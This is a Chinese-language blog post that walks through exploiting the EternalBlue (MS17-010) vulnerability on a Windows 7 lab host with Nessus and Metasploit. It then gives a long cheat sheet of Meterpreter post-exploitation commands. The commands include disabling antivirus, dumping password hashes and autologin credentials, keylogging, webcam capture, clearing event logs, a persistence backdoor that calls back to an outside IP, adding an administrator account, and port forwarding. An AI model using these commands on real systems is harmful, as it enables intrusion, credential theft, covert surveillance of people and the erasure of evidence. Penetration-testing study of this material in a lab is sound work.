永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
环境部署
靶机:win7(172.168.100.158)
工具机:kali,nessus
攻击步骤
1、nessus扫描靶机
2、根据扫描结果查看靶机漏洞
3、发现靶机存在永恒之蓝(MS17-010)漏洞
4、打开工具机kali,打开MSF漏洞利用框架
5、搜索相关漏洞利用模块
5、利用MS17-010漏洞攻击模块进行攻击
(1)use调用攻击模块
(2)options查看需要进行的设置
(3)set命令设置rhost(目标主机)
(4)run(exploit)进行攻击
6、攻击成功。获取权限
渗透常用命令
下面展示一些 msf及后渗透常用命令。
// 常用命令
chcp 65001 #shell 编码乱码
run post/windows/manage/migrate #自动进程迁移
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav #关闭杀毒软件
run post/windows/manage/enable_rdp #开启远程桌面服务
run post/windows/manage/autoroute #查看路由信息
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run post/windows/gather/enum_applications #列举应用程序
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run windows/gather/smart_hashdump #dump出所有用户的hash
clearev #清除事件日志
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下
getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
load #使用扩展库
run #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev #清除日志
命令示例
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
sysinfo #查看目标主机系统信息
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/windows/manage/migrate #自动进程迁移
run post/windows/manage/killav #关闭杀毒软件,由于靶机未装杀毒软件。所以未发现进程
run post/windows/manage/enable_rdp #开启远程桌面服务
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run windows/gather/smart_hashdump #dump出所有用户的hash
获取权限后shell,输入shell发现乱码,这是编码问题
输入chcp 65001解决乱码问题
增加用户并提权
net user 用户名 密码 /add
net localgroup administrators test /add
查看ip,利用创建好的账号密码远程登陆
永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令相关推荐
- CVE-2018-8174漏洞复现及内网渗透攻击
文章目录 说明 CVE-2018-8174漏洞简介 Persistence后门 环境搭建 拓扑图 Win server 2008 对Windows 7开启1433端口 内网攻击过程 1号机获得2号机的 ...
- Windows经常蓝屏 启动速度慢 经常死机 +常用dos命令(win10、win11适用)
Windows经常蓝屏 启动速度慢 经常死机 +常用dos命令(win10.win11适用) Windows下常用的Dos命令 文件操作 目录切换:cd 切换到别的盘 (比如D盘) d: 查看当前目录 ...
- 永恒之蓝(ms17-010)简介与复现
一.永恒之蓝的介绍 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...
- 永恒之蓝和震网病毒复现
永恒之蓝 1.打开msf 2.漏洞编码查找 search ms17_010 使用:use auxiliary/scanner/smb/smb_ms17_010 靶机探测:set rhosts 192. ...
- 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...
- 漏洞复现----6、Jenkins远程命令执行漏洞(CVE-2018-1000861)
文章目录 一.Jenkins简介 二.CVE-2018-1000861简介 三.漏洞复现 一.Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发. 可用于自动化各种任务,如 ...
- 【漏洞利用】使用永恒之蓝的双倍脉冲模块(Eternalblue_doublepulsar)渗透攻击Win_7 32位主机
使用这个模块本来是用来做攻击测试的,但是我始终没有测试成功,我大概花了1天半的时间,一直在研究为什么网上的文章里都显示测试成功了,我的就没有成功,一直在找原因,因为除了时间上的差异,kali模块增多, ...
- CVE-2018-1111漏洞复现-环境搭建与dhcp命令注入
0×01 前言 2018年5月,在Red Hat Enterprise Linux多个版本的DHCP客户端软件包所包含的NetworkManager集成脚本中发现了命令注入漏洞(CVE-2018-11 ...
- 永恒之蓝漏洞复现测试
永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...
最新文章
- 微信小程序wx:for 的使用
- window环境Visual Studio配置:OpenCV,Eigen,jsoncpp
- JavaScript 技术篇-js自动转换类型,自动转换为字符串,js避免自动转换的坑
- 计算机编程结构类型,运城计算机编程内存的概念与结构类型
- virtualenv 模块
- NodeJS学习笔记(一)——搭建开发框架Express,实现Web网站登录验证
- 《SuperMap GIS二次开发MVC实战训练---江海区慢性病防治院系统》项目研发阶段性总结
- Android studio安装过程中入的坑的记录与记录
- 修改ftp服务器用户,通过批处理修改FTP账号和密码
- java泛型通俗讲解
- jmeter压力测试的辅助插件和实操技巧
- Weblogic 视频教程免费下载
- 数组对象转json格式
- 【多元统计分析及R语言建模】第一章第 多元统计分析的概述
- nfc加密卡pm3和pm5区别_【黑科技】NFC模拟门卡门禁
- 设置QQ空间背景音乐
- MySQL year函数
- 什么是PaaS平台?一文看懂SaaS、PaaS和私有化部署的区别
- cad移动时捕捉不到基点_CAD很难学吗?其实不然,掌握这10个知识你就能走天下!...
- Codeforces 821B Okabe and Banana Trees 题解